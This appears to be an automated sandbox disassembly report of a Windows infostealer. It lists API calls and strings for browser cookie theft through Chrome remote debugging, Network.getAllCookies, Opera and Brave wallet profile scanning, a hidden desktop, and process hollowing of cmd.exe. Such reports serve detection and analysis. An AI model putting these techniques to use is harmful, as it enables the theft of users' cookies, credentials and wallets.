lstrcatA.KERNEL32(?,?), ref: 00D5B061
_memset.LIBCMT ref: 00D5B251
lstrcatA.KERNEL32(?,?), ref: 00D5B263
lstrcatA.KERNEL32(?,?), ref: 00D5B273
lstrcatA.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 00D5B285
StrCmpCA.SHLWAPI(?), ref: 00D5B2D3
CopyFileA.KERNEL32(?,?,00000001), ref: 00D5B393

Part of subcall function 00D59148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D59163
Part of subcall function 00D59148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00D5F752,?,?,?), ref: 00D5917A
Part of subcall function 00D59148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00D5F752,?,?,?), ref: 00D59191
Part of subcall function 00D59148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D591A8
Part of subcall function 00D59148: CloseHandle.KERNEL32(?,?,?,?,?,00D5F752,?,?,?), ref: 00D591D0

DeleteFileA.KERNEL32(?), ref: 00D5B43E

Part of subcall function 00D68BE6: CreateThread.KERNEL32(00000000,00000000,00D68B15,?,00000000,00000000), ref: 00D68C85
Part of subcall function 00D68BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00D68C8D

StrCmpCA.SHLWAPI(?), ref: 00D5B46F
lstrcatA.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 00D5B073

Part of subcall function 00D638A6: GetSystemTime.KERNEL32(?,00D87807,?), ref: 00D638D5

CopyFileA.KERNEL32(?,?,00000001), ref: 00D5B1B8
CopyFileA.KERNEL32(?,?,00000001), ref: 00D5B52F
DeleteFileA.KERNEL32(?), ref: 00D5B5C9
FindNextFileA.KERNEL32(?,?), ref: 00D5B6A7
FindClose.KERNEL32(?), ref: 00D5B6BB

Strings

_webdata.db, xrefs: 00D5B3DB
_cookies.db, xrefs: 00D5AFEE
Brave, xrefs: 00D5AC39
Opera GX, xrefs: 00D5AAB7
\BraveWallet\Preferences, xrefs: 00D5AD31
Preferences, xrefs: 00D5AC4F
_cookies.db, xrefs: 00D5B205
--remote-debugging-port=9223 --profile-directory=", xrefs: 00D5B279
--remote-debugging-port=9223 --profile-directory=", xrefs: 00D5B067

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: File$lstrcat$lstrcpy$Copy$CloseDeleteFind_memset$CreateHandleProcesslstrlen$AllocFirstLocalNextObjectOpenReadSingleSizeSystemTerminateThreadTimeWait
String ID: --remote-debugging-port=9223 --profile-directory="$ --remote-debugging-port=9223 --profile-directory="$Brave$Opera GX$Preferences$\BraveWallet\Preferences$_cookies.db$_cookies.db$_webdata.db
API String ID: 1219303437-2271920603
Opcode ID: 298f07f9a4e0ef5019d256c779a92661b0f69900f05421a8649d75df8202c854
Instruction ID: 5c484e6ca183f18b42c8dd8d7958d6768849a619ee0f8e9d33be4943111e5d37
Opcode Fuzzy Hash: 298f07f9a4e0ef5019d256c779a92661b0f69900f05421a8649d75df8202c854
Instruction Fuzzy Hash: A272E8729406299BCF21EB64DD46AED7778EF09301F4005A1BD48B3162DB31AF998FB1

Function 00D57FAB Relevance: 60.2, APIs: 28, Strings: 6, Instructions: 715networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00D60532: std::_Xinvalid_argument.LIBCPMT ref: 00D6054B

Part of subcall function 00D6045E: _memmove.LIBCMT ref: 00D60478

Part of subcall function 00D602CD: memchr.MSVCRT ref: 00D60336

WSAStartup.WS2_32(00000202,?), ref: 00D58241

Part of subcall function 00D60532: _memmove.LIBCMT ref: 00D6059D

socket.WS2_32(00000002,00000001,00000006), ref: 00D5825D
WSACleanup.WS2_32 ref: 00D5826E
getaddrinfo.WS2_32(?,00000000,?,?), ref: 00D582CD
closesocket.WS2_32(?), ref: 00D582DD
WSACleanup.WS2_32 ref: 00D582E3

Strings

ws://, xrefs: 00D58055
Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 00D58435
Sec-WebSocket-Version: 13, xrefs: 00D5847A
{"id":1,"method":"Network.getAllCookies"}, xrefs: 00D5859F
:, xrefs: 00D5816B
HTTP/1.1Host: , xrefs: 00D583AB

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Cleanup_memmove$StartupXinvalid_argumentclosesocketgetaddrinfomemchrsocketstd::_
String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Network.getAllCookies"}
API String ID: 2519114892-1552268179
Opcode ID: 648521633a9e31efeb0896c5ca336c3c9c77c6edd934003417d11dc3e6233115
Instruction ID: 132a8c2893499a623607e071788aef198d493b4250f1f7949b493779a83c58a8
Opcode Fuzzy Hash: 648521633a9e31efeb0896c5ca336c3c9c77c6edd934003417d11dc3e6233115
Instruction Fuzzy Hash: 3D628B75C002689FDF219B24CC85AEABBB4AF04311F4041DAEA89B3551DBB05FC99F71

Function 00D6785A Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 179filestringmemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00D6787F
HeapAlloc.KERNEL32(00000000), ref: 00D67886
wsprintfA.USER32 ref: 00D6789F
FindFirstFileA.KERNEL32(?,?), ref: 00D678B6
StrCmpCA.SHLWAPI(?,00D87AD8), ref: 00D678D7
StrCmpCA.SHLWAPI(?,00D87ADC), ref: 00D678F1
CopyFileA.KERNEL32(?,?,00000001), ref: 00D679D5

Part of subcall function 00D67548: _memset.LIBCMT ref: 00D67580
Part of subcall function 00D67548: _memset.LIBCMT ref: 00D67591
Part of subcall function 00D67548: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00D675BC
Part of subcall function 00D67548: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00D675DA
Part of subcall function 00D67548: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 00D675EE
Part of subcall function 00D67548: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00D67601
Part of subcall function 00D67548: StrStrA.SHLWAPI(00000000), ref: 00D676B7

DeleteFileA.KERNEL32(?), ref: 00D679F8
wsprintfA.USER32 ref: 00D67918

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D638A6: GetSystemTime.KERNEL32(?,00D87807,?), ref: 00D638D5

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

FindNextFileA.KERNEL32(?,?), ref: 00D67A27
FindClose.KERNEL32(?), ref: 00D67A3B
lstrcatA.KERNEL32(?), ref: 00D67A69
lstrcatA.KERNEL32(?), ref: 00D67A7C
lstrlenA.KERNEL32(?), ref: 00D67A88
lstrlenA.KERNEL32(?), ref: 00D67AA5

Strings

%s\*, xrefs: 00D67899
%s\%s, xrefs: 00D67912

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filelstrcpy$Findlstrlen$Heap_memsetwsprintf$AllocCloseCopyDeleteFirstNextProcessSystemTime
String ID: %s\%s$%s\*
API String ID: 2636950706-2848263008
Opcode ID: a8ca38a1e35d065bb6fca487290858f949265653d43603a9d77490f7d732e47d
Instruction ID: 6af553ba9fd4bd468407ca6f42de83342183787be871f598d7c9710c2c63625a
Opcode Fuzzy Hash: a8ca38a1e35d065bb6fca487290858f949265653d43603a9d77490f7d732e47d
Instruction Fuzzy Hash: 50711CB194022C9BDF60EB64DC46ADD7779FF49301F0004E5AA09A3261EB319F99CF65

Function 00D58DEA Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 149stringsleepprocessCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D58E2B
wsprintfA.USER32 ref: 00D58E44
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00D58E5D
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00D58E79
_memset.LIBCMT ref: 00D58E99
lstrcatA.KERNEL32(00000000,?), ref: 00D58EAE
lstrcatA.KERNEL32(00000000,?), ref: 00D58EC1
lstrcatA.KERNEL32(00000000,00D8821C), ref: 00D58ED3
_memset.LIBCMT ref: 00D58EE2
lstrcpyA.KERNEL32(?,00000000), ref: 00D58F13
_memset.LIBCMT ref: 00D58F30
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 00D58F8B
Sleep.KERNEL32(00001388), ref: 00D58F9A
CloseDesktop.USER32(?), ref: 00D58FCF

Strings

ChromeBuildTools, xrefs: 00D58E33
D, xrefs: 00D58F5A
OCALAPPDATA, xrefs: 00D58EFA

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: _memset$Desktoplstrcat$Create$CloseOpenProcessSleeplstrcpywsprintf
String ID: ChromeBuildTools$D$OCALAPPDATA
API String ID: 3792893142-3777181503
Opcode ID: 6c7ae12bcfcc974610264c5265a5d87a37eb14819cd9ac2e50c224fa715b5fe7
Instruction ID: 466b9fe7f714aef3cdad811d18babf928fbd824eb2a3074ec2303ae0294a1947
Opcode Fuzzy Hash: 6c7ae12bcfcc974610264c5265a5d87a37eb14819cd9ac2e50c224fa715b5fe7
Instruction Fuzzy Hash: 89510DB594022CAFDB61DF64DC8AFDAB7BCEB08314F400496F909E2151DA709B988F70

Function 00D6DC54 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

/, xrefs: 00D6DD07
UT, xrefs: 00D6DF7F

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 9258648897260e6423ed3410ea5a3c000efe45729c9f6cd5445243af3d01a982
Instruction ID: 73c15ff8f2fb5ac7d52f4a081732ff8463de010de4e53c58f18595f312ed32ad
Opcode Fuzzy Hash: 9258648897260e6423ed3410ea5a3c000efe45729c9f6cd5445243af3d01a982
Instruction Fuzzy Hash: 0B02C5B4E042688FDF21DF64D88079EBBB6EF45300F1844E9D949AB242D7748E84CFA5

Function 00D612EC Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130threadinjectionmemoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D6131E
CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,00D87615,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,?), ref: 00D61342
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00D61354
GetThreadContext.KERNEL32(?,00000000), ref: 00D61366
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00D61384
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00D6139A
ResumeThread.KERNEL32(?), ref: 00D613AA
WriteProcessMemory.KERNEL32(?,00000000,00D649B4,?,00000000), ref: 00D613C9
WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00D613FF
WriteProcessMemory.KERNEL32(?,?,D74DE8E8,00000004,00000000), ref: 00D61426
SetThreadContext.KERNEL32(?,00000000), ref: 00D61438
ResumeThread.KERNEL32(?), ref: 00D61441

Strings

(, xrefs: 00D61408
C:\Windows\System32\cmd.exe, xrefs: 00D6133D

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
String ID: ($C:\Windows\System32\cmd.exe
API String ID: 3621800378-4087486346
Opcode ID: 492979c2efd67aebb9b4b1acff470820288d3fbd5fbd6a7785d7156ab703e22c
Instruction ID: 89f5d4452e0de32c15fd74134ce62cd8acdcad316a50f7da6d823dc2c3cc69dc
Opcode Fuzzy Hash: 492979c2efd67aebb9b4b1acff470820288d3fbd5fbd6a7785d7156ab703e22c
Instruction Fuzzy Hash: A1413676A00208BFDB119FA8CD85FEAB7B8FF48705F144465FA05E6261D371A9448B24

Function 00D5CE96 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

FindFirstFileA.KERNEL32(?,?,\*.*,00D878EE,00D5DC21,?,?), ref: 00D5CF0E
StrCmpCA.SHLWAPI(?,00D88638), ref: 00D5CF2E
StrCmpCA.SHLWAPI(?,00D8863C), ref: 00D5CF48
StrCmpCA.SHLWAPI(?,Opera,00D8790D,00D87907,00D87906,00D87903,00D878F3,00D878F2,00D878EF), ref: 00D5CFD4
StrCmpCA.SHLWAPI(?,Opera GX), ref: 00D5CFE2
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 00D5CFF0

Strings

Opera GX, xrefs: 00D5CFDA
Opera, xrefs: 00D5CFCC
\*.*, xrefs: 00D5CEBC
Opera Crypto, xrefs: 00D5CFE8

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1710495004
Opcode ID: 8b850a08c77d8b3b60c628cc0f08a7657fea7c91b8c25bc8d294957e63273ebf
Instruction ID: 5d74eeed6f4097460194a24ca8f342f45939eac75e70a75a6886a69fce275e05
Opcode Fuzzy Hash: 8b850a08c77d8b3b60c628cc0f08a7657fea7c91b8c25bc8d294957e63273ebf
Instruction Fuzzy Hash: 3802B4329446299BCF60FB25DD47AED7374EF09301F4105A1AD48B3222DA75AF898FB1

Function 00D5DD2A Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 298filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00D5DD4F
FindFirstFileA.KERNEL32(?,?), ref: 00D5DD66
StrCmpCA.SHLWAPI(?,00D886B4), ref: 00D5DD87
StrCmpCA.SHLWAPI(?,00D886B8), ref: 00D5DDA1

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

lstrlenA.KERNEL32(00D5E3A8,00D8794F,00D886BC,?,00D8794E), ref: 00D5DE34
DeleteFileA.KERNEL32(?,00D886D4,00D87952,?,00D886D0,00D886CC,00D886C8,00D886C4), ref: 00D5E115
CopyFileA.KERNEL32(?,?,00000001), ref: 00D5E129

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D59148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D59163
Part of subcall function 00D59148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00D5F752,?,?,?), ref: 00D5917A
Part of subcall function 00D59148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00D5F752,?,?,?), ref: 00D59191
Part of subcall function 00D59148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D591A8
Part of subcall function 00D59148: CloseHandle.KERNEL32(?,?,?,?,?,00D5F752,?,?,?), ref: 00D591D0

Part of subcall function 00D68BE6: CreateThread.KERNEL32(00000000,00000000,00D68B15,?,00000000,00000000), ref: 00D68C85
Part of subcall function 00D68BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00D68C8D

FindNextFileA.KERNEL32(?,?), ref: 00D5E22F
FindClose.KERNEL32(?), ref: 00D5E243

Strings

%s\*.*, xrefs: 00D5DD49

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: File$lstrcpy$Find$CloseCreatelstrcatlstrlen$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
String ID: %s\*.*
